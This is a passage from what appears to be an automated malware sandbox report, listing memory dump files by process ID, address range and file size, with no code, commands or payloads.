                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          152KB

                                                                                                                                                                                                                                                        • memory/5032-402-0x00007FF9F1D30000-0x00007FF9F1D63000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          204KB

                                                                                                                                                                                                                                                        • memory/5032-395-0x00007FF9F1670000-0x00007FF9F173D000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          820KB

                                                                                                                                                                                                                                                        • memory/5032-325-0x00007FF9F1140000-0x00007FF9F116B000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          172KB

                                                                                                                                                                                                                                                        • memory/5032-298-0x00007FF9F1D30000-0x00007FF9F1D63000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          204KB

                                                                                                                                                                                                                                                        • memory/5032-306-0x00007FF9E2580000-0x00007FF9E2AA0000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          5.1MB

                                                                                                                                                                                                                                                        • memory/5032-312-0x00007FF9E24F0000-0x00007FF9E2577000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          540KB

                                                                                                                                                                                                                                                        • memory/5032-313-0x00007FF9E1EE0000-0x00007FF9E1F9C000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          752KB

                                                                                                                                                                                                                                                        • memory/5032-307-0x0000016BF60C0000-0x0000016BF65E0000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          5.1MB

                                                                                                                                                                                                                                                        • memory/5032-311-0x00007FF9F12D0000-0x00007FF9F12FE000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          184KB

                                                                                                                                                                                                                                                        • memory/5032-308-0x00007FF9F13F0000-0x00007FF9F1414000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          144KB

                                                                                                                                                                                                                                                        • memory/5032-310-0x00007FF9E1FA0000-0x00007FF9E21E9000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          2.3MB

                                                                                                                                                                                                                                                        • memory/5032-309-0x00007FF9F1670000-0x00007FF9F173D000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          820KB

                                                                                                                                                                                                                                                        • memory/5032-297-0x00007FF9F14F0000-0x00007FF9F1502000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                                                        • memory/5032-296-0x00007FF9ED8F0000-0x00007FF9ED933000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          268KB

                                                                                                                                                                                                                                                        • memory/5032-399-0x00007FF9F53C0000-0x00007FF9F53ED000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          180KB

                                                                                                                                                                                                                                                        • memory/5144-434-0x00000000055A0000-0x0000000005606000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          408KB

                                                                                                                                                                                                                                                        • memory/5144-435-0x0000000005610000-0x0000000005676000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          408KB

                                                                                                                                                                                                                                                        • memory/5144-503-0x0000000006F60000-0x0000000006FF6000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          600KB

                                                                                                                                                                                                                                                        • memory/5144-479-0x0000000006170000-0x000000000618A000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          104KB

                                                                                                                                                                                                                                                        • memory/5144-431-0x0000000002600000-0x0000000002636000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          216KB

                                                                                                                                                                                                                                                        • memory/5144-432-0x0000000004ED0000-0x000000000559A000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          6.8MB

                                                                                                                                                                                                                                                        • memory/5144-433-0x0000000004E30000-0x0000000004E52000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          136KB

                                                                                                                                                                                                                                                        • memory/5144-478-0x00000000073C0000-0x0000000007A3A000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          6.5MB

                                                                                                                                                                                                                                                        • memory/5144-447-0x0000000006240000-0x000000000628C000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                                                        • memory/5144-504-0x0000000006EF0000-0x0000000006F12000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          136KB

                                                                                                                                                                                                                                                        • memory/5144-446-0x0000000005C80000-0x0000000005C9E000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                                                        • memory/5144-445-0x0000000005790000-0x0000000005AE7000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          3.3MB

                                                                                                                                                                                                                                                        • memory/5544-18-0x0000000000EA0000-0x00000000011B4000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          3.1MB

                                                                                                                                                                                                                                                        • memory/5544-20-0x0000000000EA0000-0x00000000011B4000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          3.1MB

                                                                                                                                                                                                                                                        • memory/5596-1864-0x00000000007F0000-0x0000000001200000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          10.1MB

                                                                                                                                                                                                                                                        • memory/5596-883-0x00000000007F0000-0x0000000001200000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          10.1MB

                                                                                                                                                                                                                                                        • memory/5596-1915-0x00000000007F0000-0x0000000001200000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          10.1MB

                                                                                                                                                                                                                                                        • memory/5668-404-0x0000000000400000-0x0000000000465000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          404KB

                                                                                                                                                                                                                                                        • memory/5668-403-0x0000000000400000-0x0000000000465000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          404KB

                                                                                                                                                                                                                                                        • memory/5992-547-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          164KB

                                                                                                                                                                                                                                                        • memory/5992-549-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          164KB

                                                                                                                                                                                                                                                        • memory/5992-550-0x0000000000400000-0x0000000000429000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          164KB

                                                                                                                                                                                                                                                        • memory/6220-1865-0x0000000000C30000-0x00000000010E9000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4.7MB

                                                                                                                                                                                                                                                        • memory/6220-1921-0x0000000000C30000-0x00000000010E9000-memory.dmp

                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                          4.7MB